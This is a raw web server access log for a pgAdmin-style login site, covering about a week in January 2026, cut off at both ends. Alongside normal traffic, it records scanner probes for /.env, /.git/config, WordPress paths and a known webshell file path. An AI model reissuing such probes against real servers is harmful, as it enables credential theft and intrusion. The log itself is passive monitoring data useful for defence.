Safari/537.36" "https://targetts.ddns.net/login?next=/" +[13/Jan/2026:11:07:43 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 84.1.26.27] [Length 171676] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://targetts.ddns.net/static/js/generated/style.css?ver=91100" +[13/Jan/2026:16:43:28 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 217.182.64.155] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0" "-" +[13/Jan/2026:20:31:56 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 23.95.96.140] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[13/Jan/2026:21:31:02 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 94.142.241.195] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "certstream-crawler/1.0" "-" +[13/Jan/2026:21:31:02 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico" [Client 94.142.241.195] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "python-requests/2.31.0" "-" +[13/Jan/2026:21:31:02 +0000] - 302 302 - GET https targetts.ddns.net "/login?next=/" [Client 94.142.241.195] [Length 205] [Gzip -] [Sent-to 172.17.0.1] "certstream-crawler/1.0" "-" +[13/Jan/2026:21:31:02 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 94.142.241.195] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "python-requests/2.31.0" "-" +[13/Jan/2026:21:31:03 +0000] - 302 302 - GET https targetts.ddns.net "/browser/" [Client 94.142.241.195] [Length 229] [Gzip -] [Sent-to 172.17.0.1] "certstream-crawler/1.0" "-" +[13/Jan/2026:21:31:03 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/browser/" [Client 94.142.241.195] [Length 2420] [Gzip -] [Sent-to 172.17.0.1] "certstream-crawler/1.0" "-" +[14/Jan/2026:09:02:35 +0000] - 404 404 - GET https targetts.ddns.net "/robots.txt" [Client 35.86.218.191] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[14/Jan/2026:09:02:35 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 35.86.218.191] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[14/Jan/2026:09:02:35 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 35.86.218.191] [Length 2421] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[14/Jan/2026:13:31:08 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 204.76.203.25] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[14/Jan/2026:13:31:08 +0000] - 200 200 - GET https targetts.ddns.net "/login" [Client 204.76.203.25] [Length 6219] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[14/Jan/2026:19:33:25 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 205.169.39.53] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-" +[14/Jan/2026:19:33:26 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 205.169.39.53] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-" +[14/Jan/2026:19:33:26 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 205.169.39.53] [Length 2495] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-" +[14/Jan/2026:19:33:27 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 205.169.39.53] [Length 91437] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:27 +0000] - 200 200 - GET https targetts.ddns.net "/static/vendor/require/require.min.js?ver=91100" [Client 205.169.39.53] [Length 7187] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:27 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 205.169.39.53] [Length 5996] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:27 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 205.169.39.53] [Length 153691] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:27 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 205.169.39.53] [Length 172313] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:27 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 205.169.39.53] [Length 323675] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:28 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 205.169.39.53] [Length 2351296] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:30 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/security.pages.js?ver=91100" [Client 205.169.39.53] [Length 134798] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:31 +0000] - 200 200 - GET https targetts.ddns.net "/browser/js/endpoints.js?ver=91100" [Client 205.169.39.53] [Length 3738] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:31 +0000] - 200 200 - GET https targetts.ddns.net "/tools/translations.js?ver=91100" [Client 205.169.39.53] [Length 321] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/login?next=/" +[14/Jan/2026:19:33:32 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 205.169.39.53] [Length 171676] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "https://targetts.ddns.net/static/js/generated/style.css?ver=91100" +[15/Jan/2026:00:31:23 +0000] - 404 404 - GET https targetts.ddns.net "/.git/config" [Client 195.178.110.191] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" +[15/Jan/2026:07:48:20 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 199.45.155.80] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[15/Jan/2026:08:06:37 +0000] - - 400 - GET http targetts.ddns.net "/" [Client 162.142.125.222] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:08:21:55 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 45.139.104.168] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3722.400 QQBrowser/10.5.3739.400" "-" +[16/Jan/2026:13:36:09 +0000] - 404 404 - GET https targetts.ddns.net "/robots.txt" [Client 138.246.253.24] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" "-" +[16/Jan/2026:19:14:08 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 216.26.240.38] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" "-" +[16/Jan/2026:19:14:41 +0000] - 404 404 - GET https targetts.ddns.net "/.env" [Client 104.207.36.234] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36" "-" +[16/Jan/2026:20:23:19 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 34.48.15.210] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:20:23:19 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.48.15.210] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://targetts.ddns.net" +[16/Jan/2026:20:23:19 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 34.48.15.210] [Length 2387] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "https://targetts.ddns.net/" +[17/Jan/2026:01:51:01 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.20.201.240] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Jan/2026:01:54:31 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 116.98.244.73] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[17/Jan/2026:01:54:33 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 185.187.90.215] [Length 2280] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "https://92.249.249.197/" +[17/Jan/2026:01:54:34 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico" [Client 92.62.77.251] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0" "-" +[17/Jan/2026:01:54:34 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 189.230.57.183] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0" "https://92.249.249.197/favicon.ico" +[17/Jan/2026:01:55:20 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.18.186.238] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Jan/2026:01:55:21 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 3.18.186.238] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[17/Jan/2026:01:55:21 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.18.186.238] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "http://targetts.ddns.net/" +[17/Jan/2026:01:55:21 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 3.18.186.238] [Length 2384] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "https://targetts.ddns.net/" +[17/Jan/2026:15:26:30 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.91.19.29] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[17/Jan/2026:15:26:30 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 34.91.19.29] [Length 2424] [Gzip -] [Sent-to 172.17.0.1] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[18/Jan/2026:17:23:21 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 34.68.123.1] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:22 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.68.123.1] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:22 +0000] - 404 404 - GET https targetts.ddns.net "//wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:22 +0000] - 404 404 - GET https targetts.ddns.net "//xmlrpc.php?rsd" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:22 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.68.123.1] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:23 +0000] - 404 404 - GET https targetts.ddns.net "//blog/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:23 +0000] - 404 404 - GET https targetts.ddns.net "//web/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:23 +0000] - 404 404 - GET https targetts.ddns.net "//wordpress/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:23 +0000] - 404 404 - GET https targetts.ddns.net "//website/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:23 +0000] - 404 404 - GET https targetts.ddns.net "//wp/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:23 +0000] - 404 404 - GET https targetts.ddns.net "//news/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//2018/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//2019/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//shop/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//wp1/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//test/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//media/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//wp2/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:24 +0000] - 404 404 - GET https targetts.ddns.net "//site/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:25 +0000] - 404 404 - GET https targetts.ddns.net "//cms/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:25 +0000] - 404 404 - GET https targetts.ddns.net "//sito/wp-includes/wlwmanifest.xml" [Client 34.68.123.1] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:17:23:25 +0000] - - 400 - - https targetts.ddns.net "-" [Client 34.68.123.1] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[19/Jan/2026:02:11:29 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.82.83.37] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:29 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 34.82.83.37] [Length 2309] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:29 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 34.82.83.37] [Length 150876] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:29 +0000] - 200 200 - GET https targetts.ddns.net "/static/vendor/require/require.min.js?ver=91100" [Client 34.82.83.37] [Length 6947] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:30 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico?ver=91100" [Client 34.82.83.37] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:30 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.82.83.37] [Length 5734] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:30 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 34.82.83.37] [Length 87470] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:30 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 34.82.83.37] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:30 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.82.83.37] [Length 167356] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:30 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 34.82.83.37] [Length 313733] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:02:11:31 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 34.82.83.37] [Length 2321194] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:10:57:19 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 64.226.75.74] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[19/Jan/2026:10:57:19 +0000] - - 301 - GET http targetts.ddns.net "/favicon.ico" [Client 64.226.75.74] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://targetts.ddns.net/" +[19/Jan/2026:10:57:20 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 64.226.75.74] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[19/Jan/2026:10:57:20 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 64.226.75.74] [Length 2421] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[19/Jan/2026:10:57:20 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico" [Client 64.226.75.74] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://targetts.ddns.net/login?next=/" +[19/Jan/2026:23:24:21 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 188.213.34.8] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:24:21 +0000] - - 301 - GET http targetts.ddns.net "/favicon.ico" [Client 188.213.34.8] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:24:22 +0000] - - 499 - GET https targetts.ddns.net "/favicon.ico" [Client 37.19.223.237] [Length 0] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[20/Jan/2026:02:14:08 +0000] - 504 504 - GET https targetts.ddns.net "/" [Client 34.169.204.82] [Length 566] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:11:46:01 +0000] - - 499 - GET https targetts.ddns.net "/robots.txt" [Client 74.7.230.56] [Length 0] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[20/Jan/2026:12:28:34 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 40.83.96.65] [Length 166] [Gzip -] [Sent-to 